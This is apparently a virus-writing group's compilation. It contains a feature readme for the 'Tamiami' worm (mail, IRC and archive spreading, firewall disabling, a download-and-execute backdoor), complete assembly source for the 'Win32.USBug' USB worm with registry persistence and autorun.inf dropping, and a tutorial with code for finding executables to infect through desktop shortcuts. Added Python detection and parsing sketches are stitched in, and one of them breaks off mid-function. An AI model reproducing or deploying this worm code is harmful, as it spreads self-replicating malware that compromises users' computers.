is better for this worm. As example the autostart function, in the first version of Tamiami
it was able to infect an autostart application. But now it has a tool included that makes
termination of the worm harder, but read later about it. I am sure I will make some more
versions of the worm, because I still have many ideas.

// HTTP Server
The worm has its own HTTP server, that can provide a website at the infected computer. The
HTTP server is used for mail spreading via a spoofed link, and spreading via IRC and mIRC.
Read on for that.

// Website creator
Yes, that's right, the worm creates a website on an infected computer. For that it gets
three pictures from the user's "My Pictures" folder. It then creates HTML code that
contains the pictures, sublinks to enlarge them, and a link to the worm binary, disguised
as a self-extracting archive containing more pictures.

// Mail spreading via spoofed link
The worm has now only mail spreading via simple MAPI (SMTP version in progress). The worm
sends a mail with the spoofed link to an infected computer (where the website is) to all
mail addresses that can be found in the inbox of Outlook.

// Spoofed link
Tamiami sends only spoofed links (Mail, IRC, mIRC). The IP of the infected machine is
spoofed by the http://user:pass@IP(in %hex) formation.

// Mail spreading via attachment
If mail spreading via spoofed link failed (e.g. can't run HTTP server), the worm sends
mails to all addresses in the inbox of Outlook with a binary of the worm attached.

// Disabling MAPI warning
For sending mails without a warning by Outlook the worm disables it via an entry in the
registry.

// Extract mail addresses
The worm reads mail addresses from the Outlook inbox and stores the addresses as files in a
folder. Why that? If you do it via files, you have no victim address twice, and invalid
file names mean invalid mail addresses.

// Two languages
The worm is able to spread via two languages, German if the system is a German one,
otherwise English. It spreads via two languages in mail spreading and zip & rar spreading,
and it also creates the website and spoofed links in two languages.

// Autostart
As I said in the intro, the worm has a simple autostart, via an entry in the registry.
Other functions for autostart can be found in the documentation.

// Creating a mutex
To not run twice the worm creates a mutex. Before it does its action it checks if the
mutex already exists, if so the worm terminates its process, because it already runs.

// Update Tamiami
The worm is able to update itself: if a newer version comes to the system and an older one
already exists, the worm updates itself on it.

// Disabling XP firewall
The firewall that comes with XP SP2 will be disabled by the worm, via an entry in the
registry.

// Drive spreading
The worm checks every drive from B:\ to Z:\ if it's a remote drive (fixed share). If so it
copies the worm binary with a random name.

// RAR & ZIP worm
Tamiami searches on all fixed drives (remote or local) for all ZIP and RAR archives. If it
finds one, the worm adds itself with a random name to the archive.

// IRC spreading
Tamiami connects to 6 of the biggest IRC servers, joins channels with many people inside
and idles there. It recognizes when a user joins a channel, and then it sends a private
message with a spoofed link to the infected PC and its website. If the worm gets kicked or
banned it joins a new channel and spreads there.

// mIRC spreading
When mIRC is running the worm loads a script dynamically into mIRC. The script spreads the
worm binary via DCC when someone joins a channel.

// IRC backdoor
Inside the worm there is also an IRC backdoor, not for criminal intent, but maybe to clean
infected machines if this worm breaks out. The bot only has raw, quit, version and download
and execute commands.

// DOC infection
The worm drops a .vbs file that inserts code in Word's Normal.dot template; that code
infects every opened .doc file with a small dropper code and the worm binary.

// Take care for me
To avoid termination, the worm drops my tool "TakeCareOnMe" to disk, and executes it with
the worm path as parameter. That way, it restarts Tamiami when it gets terminated.

// Payload
The payload activates on September 17 every year. Then it prints random text with random
color and random position to the screen. The loop is infinite, so very annoying. And if the
worm is terminated, it gets restarted by TakeCareOnMe.

// Outro
Hope that "read me" covers all features of the worm, to get a closer look you can look at
the big documentation "_Ver_Inc_Docu.h". I am sure in near or far future you will see a
newer version of this worm. So long, have fun with this code.

DiA/RRLF - 16.06.2006
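The link format named under "Spoofed link" (http://user:pass@IP with the address percent-encoded) can be recognised on the receiving side, for example in a mail or chat filter. The following Python sketch is an added example, not part of the Tamiami source; the function names, the finding labels and the sample messages are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Constructed sample messages; all addresses come from documentation ranges.
SAMPLE_MESSAGES = [
    "my holiday pictures: "
    "http://www.photo-album.example:2006@%31%39%32%2e%30%2e%32%2e%34%34/index.html",
    "manual is at https://docs.example.org/guide?id=7",
    "router admin page http://198.51.100.7/status",
]

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def analyse_url(url):
    """Report the host a client would really contact and what looks deceptive."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return {"url": url, "real_host": None, "decoy": None,
                "findings": ["unparseable"]}

    raw_host = parts.hostname or ""          # everything after the last '@'
    real_host = unquote(raw_host)            # undo %xx so the address is readable
    decoy = unquote(parts.username) if parts.username is not None else None

    findings = []
    if decoy is not None:
        findings.append("userinfo")          # text before '@' is never the host
        if "." in decoy:
            findings.append("userinfo-looks-like-host")
    if "%" in raw_host:
        findings.append("percent-encoded-host")
    try:
        ipaddress.ip_address(real_host)
        findings.append("ip-literal-host")
    except ValueError:
        pass
    return {"url": url, "real_host": real_host, "decoy": decoy,
            "findings": findings}


def is_spoofed_link(report):
    """Userinfo combined with a hidden or numeric host matches the described format."""
    found = set(report["findings"])
    return "userinfo" in found and bool(
        found & {"percent-encoded-host", "ip-literal-host"})


def scan_messages(messages):
    """Return one report per URL that matches the spoofed-link pattern."""
    hits = []
    for message in messages:
        for url in URL_RE.findall(message):
            report = analyse_url(url)
            if is_spoofed_link(report):
                hits.append(report)
    return hits


if __name__ == "__main__":
    for hit in scan_messages(SAMPLE_MESSAGES):
        print(f"{hit['decoy']!r} is shown, {hit['real_host']!r} is contacted: "
              f"{', '.join(hit['findings'])}")
```

A plain IP link without userinfo and an ordinary hostname link are both left alone; only the combination the readme describes is reported.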

sources

Win32.USBug DiA ; Win32.USBug - A simple USB Worm ; by DiA/RRLF ; http://www.vx-dia.de.vu ; DiA_hates_machine@gmx.de ; ; Alot of comments, pretty much self explaining, have fun with this little fucker. include "%fasminc%\win32ax.inc" ;common stuff section "usbug" code readable writeable executable ;just one section invoke GetModuleFileName,\ ;get our path 0,\ ;this module OurPath,\ ;store it here 256d ;size of buffer invoke GetSystemDirectory,\ ;get system directory SystemDir,\ ;buffer 256d ;size of buffer mov eax, dword [OurPath + 5d] ;get a dword of the string in eax (c:\wINDOws\system32\usbug.exe) mov ebx, dword [SystemDir + 5d] ;get also a dword in ebx (c:\wINDOws\system32) cmp eax, ebx ;check if same je GetWatchDrive ;then skip installation xor ecx, ecx ;clear counter GetPathEnd: ;get the end of the system path cmp byte [SystemDir + ecx], 0 ;check for terminating zero je HavePathEnd ;if so we found end of string inc ecx ;inc counter jmp GetPathEnd ;check next place HavePathEnd: ;append our installation name mov dword [SystemDir + ecx], "\usb" ;dword for dword mov dword [SystemDir + ecx + 4d], "ug.e";no need for api here mov word [SystemDir + ecx + 8d], "xe" ;now we have full path add ecx, 10d ;update counter push ecx ;save counter to stack invoke CopyFile,\ ;copy to system directory OurPath,\ ;from here SystemDir,\ ;to system directory (contains full path) 0 ;overwrite if we are already there pop ecx ;get counter from stack mov ebx, ecx ;save counter for registry use in ebx mov byte [OurPath + ecx], 0 ;set terminating zero to string, ecx is zero after copying bytes mov esi, SystemDir ;source index is system dir buffer, counter is in ecx mov edi, OurPath ;destination is our path buffer rep movsb ;move ecx bytes from esi to edi invoke RegOpenKeyEx,\ ;open registry key HKEY_LOCAL_MACHINE,\ ;write in this key RegRunKey,\ ;write to this autostart subkey 0,\ ;reserved KEY_SET_VALUE,\ ;we wanna write a value RegHandle ;save handle here invoke RegSetValueEx,\ ;set our 
value dword [RegHandle],\ ;reg handle RegValueName,\ ;the value name, some fake of course 0,\ ;reserved REG_SZ,\ ;its a zero terminated string OurPath,\ ;full path ebx ;size of buffer (ex-counter) invoke RegCloseKey,\ ;close registry dword [RegHandle] ;via handle GetWatchDrive: ;get next free drive letter invoke GetLogicalDriveStrings,\ ;call API to get all drives as strings in AllDrives 105d,\ ;size of buffer (A:\0 = 4 bytes * 26 + terminating 0) AllDrives ;store it here mov bl, 67d ;store "C" in bl, thats where we start xor ecx, ecx ;clear counter cmp byte [AllDrives], 65d ;check if we start at A:\ jne FindWatchDrive ;if not start checking add ecx, 4d ;if there is a A:\ skip it cmp byte [AllDrives + ecx], 66d ;is there also a B:\ jne FindWatchDrive ;no, we are at C:\, start checking add ecx, 4d ;if there is a B:\ skip this, we are now at C:\ FindWatchDrive: ;find the drive where usb sticks can be plugged cmp word [AllDrives + ecx], 00d ;we are at string end? then usb drive is last available + 1 je FoundEnd ;we are at the end cmp byte [AllDrives + ecx], bl ;is there a clean chain like C D E F G ... jne FoundWatchDrive ;no? 
then we found the usb drive in the middle inc bl ;check next character add ecx, 4d ;skip C:\0 for example jmp FindWatchDrive ;and check next string FoundWatchDrive: ;usb drive is in the middle mov bl, byte [AllDrives + ecx] ;get drive AFTER the space dec bl ;dec it, so we have the usb drive mov byte [WatchDrive], bl ;store it jmp WaitForUsb ;skip FoundEnd: ;lets get last drive from end of string sub ecx, 4d ;set counter to last available drive mov bl, byte [AllDrives + ecx] ;get last available drive letter inc bl ;inc it, so we have the usb drive mov byte [WatchDrive], bl ;store it WaitForUsb: ;now lets wait until a usb stick is plugged mov dword [UsbFile], "driv" ;set filename dword by dword mov dword [UsbFile + 4d], "er.e" ;no api here too mov word [UsbFile + 8d], "xe" ;now we have a full path in WatchDrive mov byte [UsbFile + 10d], 0 ;terminating null DropToUsb: ;try to copy ourself on the drive + filename invoke CopyFile,\ ;copy file OurPath,\ ;from system directory WatchDrive,\ ;to the possible usb stick (O:\driver.exe as example) 0 ;overwrite if already exist cmp eax, 0 ;failure? jne GenerateAutorun ;if not a usb is plugged and we can generate the autostart.inf invoke Sleep,\ ;nothing plugged, sleep for 20 seconds 20000d ;20sec jmp DropToUsb ;loop it GenerateAutorun: ;drive available! usb plugged... invoke SetFileAttributes,\ ;hide our program WatchDrive,\ ;full path of it FILE_ATTRIBUTE_HIDDEN ;hidden mov dword [UsbFile], "auto" ;overwrite our copy path (driver.exe) with "autorun.inf" mov dword [UsbFile + 4d], "run." ;dword for dword mov dword [UsbFile + 8d], "inf" ;no lstrcat dude! 
invoke CreateFile,\ ;now create the autorun.inf WatchDrive,\ ;full path to usb (O:\autorun.inf) for example GENERIC_WRITE,\ ;just write to it 0,\ ;no shared mode 0,\ ;no security attributes CREATE_ALWAYS,\ ;overwrite if exist FILE_ATTRIBUTE_HIDDEN,\ ;create it hidden 0 ;no template file mov ebx, eax ;save file handle in ebx mov dword [SystemDir], "[aut" ;prepare the buffer, use already but not used buffer mov dword [SystemDir + 4d], "orun" ;dword for dword mov dword [SystemDir + 8d], "]" ;finished first line mov byte [SystemDir + 9d], 13d ;linebreak mov byte [SystemDir + 10d], 10d ;13, 10 mov dword [SystemDir + 11d], "open" ;open our program on connect mov dword [SystemDir + 15d], "=dri" ;driver.exe mov dword [SystemDir + 19d], "ver." ;lstrcat my ass mov dword [SystemDir + 23d], "exe" ;"exe" + terminating zero invoke WriteFile,\ ;write buffer to file ebx,\ ;file handle SystemDir,\ ;the buffer with the autostart.inf content 26d,\ ;number of bytes to write RegHandle,\ ;put number of written bytes to nowhere 0 ;no overlapped invoke CloseHandle,\ ;close file ebx ;via handle ret ;ExitProcess for poor people Datas: ;here are the needed datas Copyleft db "USBug - DiA/RRLF" ;bow! OurPath rb 256d ;here we store the path of this program SystemDir rb 256d ;buffer for system directory RegRunKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0 ;reg autostart RegHandle dd ? ;store reg handle here RegValueName db "Windows USB Driver", 0;fake value name for registry AllDrives rb 105d ;all available drives: C:\0D:\0E:\00 WatchDrive db "_:\" ;here we store the drive where a usb stick can be plugged UsbFile db 14d ;buffer for "driver.exe" and "autostart.inf" + terminating zero section "usb!" 
import data readable writeable ;our import table :) library kernel, "kernel32.dll",\ advapi, "advapi32.dll" import kernel,\ GetModuleFileName, "GetModuleFileNameA",\ CopyFile, "CopyFileA",\ GetLogicalDriveStrings, "GetLogicalDriveStringsA",\ Sleep, "Sleep",\ SetFileAttributes, "SetFileAttributesA",\ CreateFile, "CreateFileA",\ WriteFile, "WriteFile",\ CloseHandle, "CloseHandle",\ GetSystemDirectory, "GetSystemDirectoryA" import advapi,\ RegOpenKeyEx, "RegOpenKeyExA",\ RegSetValueEx, "RegSetValueExA",\ RegCloseKey, "RegCloseKey"

articles

Capture the desktop - scan .LNK files for victims DiA ______________________________________________________________ | | | Capture the desktop - scan .LNK files for victims |# | ************************************************* |# | |# | by DiA/rrlf (c)2004 |# | www.vx-dia.de.vu :: DiA_hates_machine@gmx.de |# |______________________________________________________________|# ############################################################### _Overview___________________________________ | | | 1. Intro |# | 2. LNK format |# | 3. How to get linked file, theory. |# | 4. How to get linked file, listing. |# | 5. How to get linked file, code. |# | 6. Play more with LNK files |# | 7. Outro |# |____________________________________________|# ############################################# Disclaimer ========== I am not responsible for anything that you do. If you use or rewrite this code you and only you are responsible for the things that you do. Take care! 1. Intro ======== Some people have a clean desktop other people have the total choas in the front of them. I speak about "Windows Shortcut Files" aka .LNK files. The shortcuts to applications, documents and other files. Most of the computer noobs use the desktop and the shortcuts very often, why not, the installation programs ask always to create a desktop shortcut. So this is a good way to find victims to infect (eg PE EXE files), if the shortcut file (.lnk) knows where the linked application or document is, we know it too (or must scan the .lnk file to know it). So lets go, find .lnk files, scan it and lets extract the full path of linked file! Have much fun with this little article... Thanks to BlueOwl for testing and his help. 2. LNK format ============= This is only a quick overview of the .lnk file format, for more information please read "The Windows Shortcut File Format as reverse-engineered by Jesse Hager". This is in my opinion the best document about .lnk files over the web. 
Overview:

*********************************************************
Section               | Size (hex)
**********************|**********************************
File Header           | 4Ch
----------------------|----------------------------------
Shell Item ID List    | ??h   ;??h means that it doesn't have a static size
----------------------|----------------------------------
File Location Info    | 22h
----------------------|----------------------------------
Local Volume Table    | 10h + Volume Label (ASCIZ)
----------------------|----------------------------------
Network Volume Table  | 14h + Network share name (ASCIZ)
----------------------|----------------------------------
Description String    | ??h
----------------------|----------------------------------
Relative Path String  | ??h
----------------------|----------------------------------
Working Directory     | ??h
----------------------|----------------------------------
Commandline String    | ??h
----------------------|----------------------------------
Icon Filename String  | ??h
----------------------|----------------------------------
Extra stuff           | ??h
*********************************************************

File Header:

*********************************************************
Offset | Size    | Contents
*******|*********|***************************************
00h    | 1 dword | 0000004Ch "L" identifies the .lnk file
-------|---------|---------------------------------------
04h    | 16 byte | GUID of shortcut file
-------|---------|---------------------------------------
14h    | 1 dword | Flags
-------|---------|---------------------------------------
18h    | 1 dword | File Attributes
-------|---------|---------------------------------------
1Ch    | 1 qword | Time 1
-------|---------|---------------------------------------
24h    | 1 qword | Time 2
-------|---------|---------------------------------------
2Ch    | 1 qword | Time 3
-------|---------|---------------------------------------
34h    | 1 dword | File Length
-------|---------|---------------------------------------
38h    | 1 dword | Icon Number
-------|---------|---------------------------------------
3Ch    | 1 dword | ShowWnd Value
-------|---------|---------------------------------------
40h    | 1 dword | Hot Key
-------|---------|---------------------------------------
44h    | 2 dword | Unknown, always Zero
*********************************************************

Shell Item ID List:

The Shell Item List section has no static size, it is variable. But that's not a hard problem, because the first unsigned short integer (at 4Ch from file begin) indicates the total length of the whole Item List. We only have to read the size and then add this size to 4Ch, then we are at the "File Location Info" section.

File Location Info:

*********************************************************
Offset | Size    | Contents
*******|*********|***************************************
00h    | 1 dword | Total length of the structure
-------|---------|---------------------------------------
04h    | 1 dword | Pointer to first offset at 1Ch
-------|---------|---------------------------------------
08h    | 1 dword | Flags
-------|---------|---------------------------------------
0Ch    | 1 dword | Offset of Local Volume Info
-------|---------|---------------------------------------
10h    | 1 dword | Offset of Base Pathname (local)
-------|---------|---------------------------------------
14h    | 1 dword | Offset of Network Volume Info
-------|---------|---------------------------------------
18h    | 1 dword | Offset of Remaining Pathname
*********************************************************

Local Volume Table:

*********************************************************
Offset | Size    | Contents
*******|*********|***************************************
00h    | 1 dword | Length of the structure
-------|---------|---------------------------------------
04h    | 1 dword | Type of Volume
-------|---------|---------------------------------------
08h    | 1 dword | Volume Serial Number
-------|---------|---------------------------------------
0Ch    | 1 dword | Offset of the Volume Name (10h)
-------|---------|---------------------------------------
10h    | ASCIZ   | Volume Label !!this is what we want!!
*********************************************************

Network Volume Table:

*********************************************************
Offset | Size    | Contents
*******|*********|***************************************
00h    | 1 dword | Length of the structure
-------|---------|---------------------------------------
04h    | 1 dword | Unknown, always 02h?!
-------|---------|---------------------------------------
08h    | 1 dword | Offset of the Network Share Name (14h)
-------|---------|---------------------------------------
0Ch    | 1 dword | Unknown, always Zero?
-------|---------|---------------------------------------
10h    | 1 dword | Unknown, always 20000h?
-------|---------|---------------------------------------
14h    | ASCIZ   | Network Share Name
*********************************************************

The Description String, Relative Path String, Working Directory, Commandline String, Icon Filename String and Extra stuff sections are uninteresting for this tutorial. For a better description read the article I recommended. I think Working Directory and Commandline String are interesting things for finding victims. But that's another story...

3. How to get linked file, theory.
==================================

OK, now we know how the .lnk file is built. What we want is the "Volume Label" in the "Local Volume Table" section. But there is one (not big) problem: it has no static offset, because the size of the "Shell Item ID List" section is variable. We have to read the size of this structure and add it to the "File Header" section, then we are at the "File Location Info" section. From this place it's not hard to get the offset of the "Volume Label".
For a better description, a little graphic:

*****************************
| File Begin            00h |
*****************************
              +
*****************************
| File Header           4Ch |
*****************************
              =
*****************************
| offset Shell Item ID List |
*****************************

Now we have the offset to the "Shell Item ID List". The first unsigned short integer indicates the size of this section. We read the size, called "ItemSize" in this graphic (eg F5h or something). Go on:

*****************************
| File Begin            00h |
*****************************
              +
*****************************
| File Header           4Ch |
*****************************
              +
*****************************
| ItemSize              F5h |
*****************************
              =
*****************************
| offset File Location Info |
*****************************

Wow, we have the offset to the "File Location Info" section, now it's not hard to get the "Volume Label" (linked file). "File Location Info" and "Local Volume Table" have a static size. Appended to the "Local Volume Table" there is the string of the linked file, ending with a zero. So let's get the offset of the first character of this string:

*****************************
| File Begin            00h |
*****************************
              +
*****************************
| File Header           4Ch |
*****************************
              +
*****************************
| ItemSize              F5h |
*****************************
              +
*****************************
| File Location Info    22h |
*****************************
              +
*****************************
| Local Volume Table    10h |
*****************************
              =
*****************************
| offset to Volume Label    |
*****************************

Now we have the offset to our string. It is ASCIZero, so we only have to check byte by byte for a zero. If a byte is zero we have the end of the string, and as a result the full path to the linked application. Good job, theoretically. :) Let's see listing and code...

4. How to get linked file, listing.
=================================== Here is the "to do" list for scanning .lnk files on the desktop for victims: 1. Read desktop path from the registry 2. Check if path string is valid, if not make it valid 3. Change current directory to the desktop path 4. Find first .lnk file 5. No more files? then go to 17. 6. Map .lnk file to handle with it 7. Check if .lnk file is valid (first dword must be "L"000000h) 8. Get offset to "Shell Item ID List" section 9. Read size of the "Shell Item ID List" 10. Skip this section (File Header + Shell Item ID List size) 11. Get offset to "Volume Label" 12. Get end of the path string and copy the string 13. Check if extracted path is valid, if not goto 15. 14. Simple Messagebox (or infection routine :) 15. Unmap file, and close handles 16. Find next .lnk file, goto 5. 17. Exit 5. How to get linked file, code. ================================ ;==================================================================================== ; Example for scanning .lnk files for victims ; assemble it with FASM 1.56 (www.flatassembler.net) ; tested under WinXP SP1 ; ; coded by DiA/rrlf ; www.vx-dia.de.vu :: DiA_hates_machine@gmx.de ;==================================================================================== ; ;_____LNKscan.asm_____cut_____start__________________________________________________ include "%fasminc%\win32ax.inc" ;equates LNKscan: ;-----get desktop path from registry-------------------- invoke RegOpenKeyEx,\ ;open a reg key HKEY_CURRENT_USER,\ ;handle of the key DesktopSubkey,\ ;the subkey string 0,\ ;reserved KEY_ALL_ACCESS,\ ;security access mask RegHandle ;save here the handle cmp eax, 0 ;error? jnz ErrorMsg ;show error message invoke RegQueryValueEx,\ ;read a value dword [RegHandle],\ ;handle of open key DesktopValue,\ ;the value name "Desktop" 0,\ ;reserved Reg_SZ,\ ;we want a string DesktopPath,\ ;save here the desktop path DesktopSize ;size of reserved place cmp eax, 0 ;error? 
jnz ErrorMsg ;if so show a error message invoke RegCloseKey,\ ;we have the desktop path, close key dword [RegHandle] ;with the handle ;-----get desktop path from registry---end-------------- ;-----check if path is valid, if not make it valid------ mov edx, DesktopPath ;address of string GetZero: cmp byte [edx], 0 ;check for end of the string je GotZero ;we have the zero inc edx ;address + 1 jmp GetZero ;check next byte GotZero: dec edx ;address (,0) - 1 cmp byte [edx], "\" ;check for the slash je HaveSlash ;and dont place a slash inc edx ;jmp after last byte of the string mov byte [edx], "\" ;place the \ mov byte [edx + 1d], 0 ; "String",0 <- HaveSlash: ;-----check if path is valid, if not make it valid--end- ;-----change directory to desktop path------------------ invoke SetCurrentDirectory,\ ;change directory DesktopPath ;to the desktop path cmp eax, 0 ;error? je ErrorMsg ;no path, no victims ;-----change directory to desktop path---end------------ ;-----find first file in current directory-------------- invoke FindFirstFile,\ ;the well known api LnkFiles,\ ;search for *.lnk Win32FindData ;structure mov dword [FindHandle], eax ;save find handle FindMoreFiles: cmp eax, 0 ;error? no more files? je Exit ;exit the application ;-----find first file in current directory---end-------- ;-----map lnk file to handle with it-------------------- invoke CreateFile,\ ;open the file Win32FindData.cFileName,\ ;the lnk file GENERIC_READ + GENERIC_WRITE,\ ;read and write access FILE_SHARE_READ,\ ;open it when we can read 0,\ ;no security attributes OPEN_EXISTING,\ ;open only the file FILE_ATTRIBUTE_NORMAL,\ ;all attributes 0 ;no flag cmp eax, INVALID_HANDLE_VALUE ;error? 
je FindNextLNK ;find next lnk file mov dword [FileHandle], eax ;save file handle invoke CreateFileMapping,\ ;create the map dword [FileHandle],\ ;handle of file 0,\ ;no security attributes PAGE_READWRITE,\ ;read and write mapping 0,\ ;size high -> null 0,\ ;size low -> null = size of whole file 0 ;no mapping name cmp eax, 0 ;error?! je CloseFile ;close the file and search next mov dword [MapHandle], eax ;save mapping handle invoke MapViewOfFile,\ ;write map to address dword [MapHandle],\ ;handle of created map FILE_MAP_WRITE,\ ;read and write 0,\ ;high offset 0,\ ;low offset -> null, address is after call in eax 0 ;how much bytes should be mappep? 0-> all cmp eax, 0 ;error? je CloseMap ;if so close the map, search next file mov dword [MapAddress], eax ;save address in memory where file begins ;-----map lnk file to handle with it---end-------------- ;-----check if .lnk file is valid----------------------- mov esi, dword [MapAddress] ;filebegin now in esi cmp dword [esi], "L" ;first dword is a 4C000000h ? jne CloseMap ;close map, search more files ;-----check if .lnk file is valid---end----------------- ;-----get linked application---------------------------- add esi, 4Ch ;jump over header mov edi, ItemSize ;to copy size of Shell Item List movsb ;copy one byte, the size (esi->edi) JumpOverItem: cmp byte [ItemSize], 0d ;counter on zero? 
je JumpedOver ;then we jumped over the Shell Item List strcture inc esi ;address + 1 dec byte [ItemSize] ;counter - 1 jmp JumpOverItem ;next byte JumpedOver: add esi, 22h ;jump over FileLoationInfo add esi, 0Ch ;jump over Location Volume Table to the volume label (ASCIZ) mov edi, Victim ;destination is Victim (esi->edi) CopyVictimString: cmp byte [esi], 0 ;0 -> end of the string (ASCIZ[ero]) je HaveVictim ;time to infect :) movsb ;move one byte from esi to edi jmp CopyVictimString ;check again for end of string HaveVictim: mov dword [edi], 0 ;clear all after string ;-----get linked application---end---------------------- ;-----check if victim path is valid--------------------- mov edx, Victim ;get address cmp byte [edx + 1d], ":" ;check for the : (eg C:) jne CloseMap ;if not then close map, search next file GetVictimZero: cmp byte [edx], 0 ;check for end of string je HaveVictimZero ;we have it inc edx ;next byte jmp GetVictimZero ;search for zero HaveVictimZero: cmp byte [edx - 4d], "." ;check for dot (eg .exe) jne CloseMap ;search next ;-----check if victim path is valid---end--------------- ;******************************************************* ;*****HERE GO THE INFECTION***************************** ;******************************************************* invoke MessageBox,\ ;only show a messagebox that it works 0,\ ;now owner window Victim,\ ;show full path of victim Win32FindData.cFileName,\ ;caption: name of scanned .lnk file MB_ICONINFORMATION ;information 4 u ;******************************************************* ;*****HERE GO THE INFECTION***END*********************** ;******************************************************* ;-----unmap view of file-------------------------------- invoke UnmapViewOfFile,\ ;unmap the file dword [MapAddress] ;with the address ;-----unmap view of file---end-------------------------- ;-----close file and map handle------------------------- CloseMap: invoke CloseHandle,\ ;close dword [MapHandle] ;the map handle CloseFile: 
invoke CloseHandle,\ ;close the handle dword [FileHandle] ;file ;-----close file and map handle---end------------------- ;-----find next lnk file-------------------------------- FindNextLNK: invoke FindNextFile,\ ;next lnk file dword [FindHandle],\ ;via find handle Win32FindData ;and the structure jmp FindMoreFiles ;get more! ;-----find next lnk file---end-------------------------- ;-----get the hell out of here-------------------------- Exit: invoke ExitProcess,\ ;exit 0 ;current process ;-----get the hell out of here---end-------------------- ;-----error message------------------------------------- ErrorMsg: invoke MessageBox,\ ;shit, some error 0,\ ;no owner window "Sorry, can't set desktop directory!",\ ;text ".:: ERROR ::.",\ ;caption MB_ICONERROR ;scary error icon ;) jmp Exit ;get out of here ;-----error message---end------------------------------- ;-----data's-------------------------------------------- DesktopSubkey db "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",0 DesktopValue db "Desktop",0 DesktopPath rb 255d DesktopSize db 255d RegHandle dd ? Reg_SZ db "REG_SZ",0 Win32FindData FINDDATA ;already defined by fasm LnkFiles db "*.lnk",0 FindHandle dd ? FileHandle dd ? MapHandle dd ? MapAddress dd ? ItemSize db ? 
Victim rb 255d ;-----data's---end--------------------------------------- ;-----api's import, fasm will do------------------------- data import ;only one section, fasm will do it :) library kernel32, "KERNEL32.DLL",\ user32, "USER32.DLL",\ advapi32, "ADVAPI32.DLL" import kernel32,\ SetCurrentDirectory, "SetCurrentDirectoryA",\ FindFirstFile, "FindFirstFileA",\ FindNextFile, "FindNextFileA",\ CreateFile, "CreateFileA",\ CreateFileMapping, "CreateFileMappingA",\ MapViewOfFile, "MapViewOfFile",\ UnmapViewOfFile, "UnmapViewOfFile",\ CloseHandle, "CloseHandle",\ ExitProcess, "ExitProcess" import advapi32,\ RegOpenKeyEx, "RegOpenKeyExA",\ RegQueryValueEx, "RegQueryValueExA",\ RegCloseKey, "RegCloseKey" import user32,\ MessageBox, "MessageBoxA" end data ;-----api's import, fasm will do---end------------------- ;_____LNKscan.asm_____cut_____end____________________________________________________ 6. Play more with LNK files =========================== OK, now we have hopefully get the linked file. Another interesting thing (maybe for worms) in the .lnk file is the "Network Share Name" in the "Network Volume Table". Its not very different from reading the "Volume Label", we only have to get the size of the "Shell Item ID List" and the size of the "Volume Label". Then add it all to get the offset to the "Network Volume Table". 
For this I have made a little graphic too:

*****************************
| File Begin            00h |
*****************************
              +
*****************************
| File Header           4Ch |
*****************************
              +
*****************************
| ItemSize              F5h |   ;size variable
*****************************
              +
*****************************
| File Location Info    22h |
*****************************
              +
*****************************
| Local Volume Table    10h |
*****************************
              +
*****************************
| size of Volume Label  0A  |   ;size variable
*****************************
              +
*****************************
| Network Volume Table  14h |
*****************************
              =
*****************************
| offset Network Share Name |
*****************************

So, you see it's not hard when we know the size of the "Shell Item ID List" and the size of the "Volume Label" string. "Network Share Name" is also ASCIZ, which means that the zero is the end of the string.

7. Outro
========

That's the end my friend, the end of this article. Hope you learned something, or got some inspiration for other projects. If you have questions, greets or fucks feel free to send me a mail to DiA_hates_machine@gmx.de or make an entry in my guestbook at http://www.vx-dia.de.vu ! See you...

DiA/rrlf - 27.11.2004
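An added example, not DiA's code and not part of the original article: a bounds-checked Python reader for the fields tabulated in section 2, of the kind used when triaging shortcut files during forensics. It follows the offset fields stored in the File Location Info structure instead of assuming fixed section sizes. The flag bits and the 2-byte size prefix of the ID list are taken from Microsoft's MS-SHLLINK specification, and the sample shortcut built by `build_sample` is constructed.

```python
import struct

HEADER_SIZE = 0x4C      # fixed header length, also the value of the first dword
HAS_ID_LIST = 0x01      # header flags bit 0 (MS-SHLLINK): Shell Item ID List present
HAS_LINK_INFO = 0x02    # header flags bit 1 (MS-SHLLINK): File Location Info present
LOCAL_PATH = 0x01       # File Location Info flags bit 0: local volume + base pathname
NETWORK_PATH = 0x02     # File Location Info flags bit 1: network volume table


class LnkError(ValueError):
    """A field points outside the data it belongs to, or the magic is wrong."""


def _uint(buf, off, fmt, size):
    if off < 0 or off + size > len(buf):
        raise LnkError(f"field at {off:#x} is out of range")
    return struct.unpack_from(fmt, buf, off)[0]


def _u16(buf, off):
    return _uint(buf, off, "<H", 2)


def _u32(buf, off):
    return _uint(buf, off, "<I", 4)


def _asciz(buf, off):
    """Read a zero-terminated string that must start and end inside buf."""
    if not 0 < off < len(buf):
        raise LnkError(f"string offset {off:#x} is out of range")
    end = buf.find(b"\x00", off)
    if end < 0:
        raise LnkError("string is not zero-terminated")
    return buf[off:end].decode("cp1252", errors="replace")


def parse_lnk(data):
    """Return the path fields of a shortcut, or raise LnkError on bad input."""
    if _u32(data, 0) != HEADER_SIZE:
        raise LnkError("first dword is not 4Ch, not a shortcut file")
    flags = _u32(data, 0x14)
    pos = HEADER_SIZE
    if flags & HAS_ID_LIST:
        pos += 2 + _u16(data, pos)      # the 16-bit size does not count itself
    out = {"local_path": None, "volume_label": None,
           "share_name": None, "remaining_path": None}
    if not flags & HAS_LINK_INFO:
        return out
    total = _u32(data, pos)
    if total < 0x1C or pos + total > len(data):
        raise LnkError("File Location Info length is inconsistent")
    info = data[pos:pos + total]        # all offsets below are relative to this slice
    info_flags = _u32(info, 0x08)
    if info_flags & LOCAL_PATH:
        vol = _u32(info, 0x0C)          # Offset of Local Volume Info
        out["volume_label"] = _asciz(info, vol + _u32(info, vol + 0x0C))
        out["local_path"] = _asciz(info, _u32(info, 0x10))   # Base Pathname
    if info_flags & NETWORK_PATH:
        net = _u32(info, 0x14)          # Offset of Network Volume Info
        out["share_name"] = _asciz(info, net + _u32(info, net + 0x08))
    out["remaining_path"] = _asciz(info, _u32(info, 0x18))
    return out


def build_sample(id_list_len=0xF5, label=b"SYSTEM", path=b"C:\\Tools\\demo.exe"):
    """Constructed shortcut bytes for the demo; not taken from a real file."""
    header = struct.pack("<I16sI", HEADER_SIZE, b"\x00" * 16,
                         HAS_ID_LIST | HAS_LINK_INFO).ljust(HEADER_SIZE, b"\x00")
    id_list = struct.pack("<H", id_list_len) + b"\x00" * id_list_len
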